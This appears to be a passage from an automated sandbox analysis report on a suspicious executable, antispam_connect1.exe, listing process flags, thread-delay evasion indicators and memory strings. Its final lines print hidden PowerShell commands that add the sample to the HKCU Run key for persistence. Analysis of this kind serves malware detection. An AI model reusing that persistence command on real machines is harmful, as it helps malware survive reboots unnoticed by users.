        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2461Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1695Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2328
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1512
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3080
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep count: 2461 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 1695 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1020Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep count: 2328 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2944Thread sleep count: 1512 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3808Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep count: 3080 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5316Thread sleep count: 278 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: antispam_connect1.exe, 00000008.00000002.3373123002.0000000003DC5000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: IUtREVuK.Ga1rqvmcIJ
        Source: antispam_connect1.exe, 00000005.00000002.3372146254.0000000001598000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
        Source: antispam_connect1.exe, 00000008.00000002.3370996963.0000000000968000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: antispam_connect1.exe, 00000000.00000002.3372457695.000000000197E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 0_2_036D4800 mov eax, dword ptr fs:[00000030h]0_2_036D4800
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 5_2_030B4800 mov eax, dword ptr fs:[00000030h]5_2_030B4800
        Source: C:\Users\user\Desktop\antispam_connect1.exeCode function: 8_2_02D84800 mov eax, dword ptr fs:[00000030h]8_2_02D84800
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"Jump to behavior
        Source: C:\Users\user\Desktop\antispam_connect1.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "if (-not (test-path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\\app\")) { set-itemproperty -path \"hkcu:\\software\\microsoft\\windows\\currentversion\\run\" -name \"app\" -value \"c:\users\user\desktop\antispam_connect1.exe\" }"Jump to behavior
